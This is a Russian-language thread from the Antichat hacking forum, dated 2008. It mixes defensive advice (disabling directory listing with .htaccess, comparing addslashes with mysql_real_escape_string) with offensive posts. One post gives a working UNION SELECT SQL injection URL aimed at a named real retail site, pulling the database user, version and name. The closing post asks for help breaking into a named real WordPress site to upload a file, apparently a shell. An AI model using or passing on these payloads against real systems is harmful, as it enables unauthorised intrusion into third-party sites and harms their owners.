Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

09.07.2008, 18:32
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме: 2693408
Репутация:
861
|
|
Qwazar, я думаю, ты ошибаешься.
hall, если там просто листинг, то макисмум это грозит тем, что пользователь узнает где и как лежат твои файлы. PHP в этом случае он читать не может, ну если конечно сервер настроен на исполнение .php файлов, как php кода)
Чтобы это исправить напиши небольшой .htaccess файл:
Код:
Options -Indexes
#дальше просто для верности :)
IndexIgnore *
Последний раз редактировалось n0ne; 09.07.2008 в 18:36..
|
|
|

09.07.2008, 19:04
|
|
Познающий
Регистрация: 31.07.2006
Сообщений: 46
Провел на форуме: 596615
Репутация:
18
|
|
не получается подобрать количество полей, все время ошибка. как быть ? _http://www.pvp.kiev.ua/price?id_group=227'
|
|
|

09.07.2008, 19:07
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме: 10605912
Репутация:
4693
|
|
Сообщение от n0ne
Qwazar, я думаю, ты ошибаешься.
Про то что можно ли читать файлы, это я вопрос задал
не получается подобрать количество полей, все время ошибка. как быть ? _http://www.pvp.kiev.ua/price?id_group=227'
Сдаётся мне ты ничего вытянуть не сможешь, т.к. кавычки/слеши экранируются.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
Последний раз редактировалось Qwazar; 09.07.2008 в 19:20..
|
|
|

09.07.2008, 19:20
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме: 2693408
Репутация:
861
|
|
Qwazar, а, тогда извиняюсь  Ну я ответил)
|
|
|

09.07.2008, 19:39
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме: 21768337
Репутация:
3486
|
|
>> Сдаётся мне ты ничего вытянуть не сможешь, т.к. кавычки/слеши экранируются.
Не в фильтрации дело. Просто видно каким то хитрожопым способом составлен запрос, и часть запроса после инъекции не отрезается комментариями.
|
|
|

09.07.2008, 22:10
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
2 cheb
В этом параметре нет инъекции.Т.е. нет возможности влиять на запрос
Посмотри сам id_group=227 вывод "группа МФУ"
id_group=226 вывод "группа ноутбуки"
id_group=227-1 вывод "группа МФУ"
Если нужна инъекция на этом сайте вот она :
http://www.pvp.kiev.ua/price?id_group=244&id_price=-14141+union+select+1,2,3,4,5,concat(user(),char(58 ),version(),char(58),database()),7,8,9,0,11,12,13, 14--
ветка пятая ,дальше сам если нужно
|
|
|

10.07.2008, 10:22
|
|
Новичок
Регистрация: 09.07.2008
Сообщений: 3
Провел на форуме: 11597
Репутация:
1
|
|
Сообщение от n0ne
Qwazar, я думаю, ты ошибаешься.
hall, если там просто листинг, то макисмум это грозит тем, что пользователь узнает где и как лежат твои файлы. PHP в этом случае он читать не может, ну если конечно сервер настроен на исполнение .php файлов, как php кода)
Чтобы это исправить напиши небольшой .htaccess файл:
Код:
Options -Indexes
#дальше просто для верности :)
IndexIgnore *
а если просто в каждой папке сделать файл index.html
и все, при обращении к папке этот файл же автоматически должен загружаться, тогда и файлы неувидишь... поправьте если мой способ неэффективен... 
|
|
|

10.07.2008, 10:26
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме: 2693408
Репутация:
861
|
|
hall, эффективен, но более, как бы сказать...дедовский, что ли)) Вариант с .htaccess'ом более практичен и прост (по крайней мере для меня) 
|
|
|

10.07.2008, 14:35
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме: 3941248
Репутация:
668
|
|
Почему советуют использовать
mysql_real_escape_string()
или mysql_escape_string()
а не addslashes()?
Можно ли воспользоватся тем что используется addslashes()?
'SELECT `username` FROM `member` WHERE `id` = \' '. addslashes($str) .' \'
хммм
сделал
$a = "\x1a";
echo "slesh ".addslashes($a).'<br>';
echo "mysql ".mysql_real_escape_string($a);
результат
slesh
mysql \Z
В 1ом слэш не добввился просто
а во 2ом не понел откуда \Z взялось oO
Последний раз редактировалось Doom123; 10.07.2008 в 18:49..
|
|
|

10.07.2008, 21:01
|
|
Познающий
Регистрация: 02.06.2008
Сообщений: 52
Провел на форуме: 218331
Репутация:
10
|
|
Привет всем!Нужна помощь!!!
Кто может помочь найти уязвимость в этом сайте http://kunik.no-ip.com/wordpress версия движка wordpress-2.5 помочь залить этот файл с сайта http://rapidshare.com/files/128670416/user.php.html на этот сайт http://kunik.no-ip.com/
Зарание спосибо!!!
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|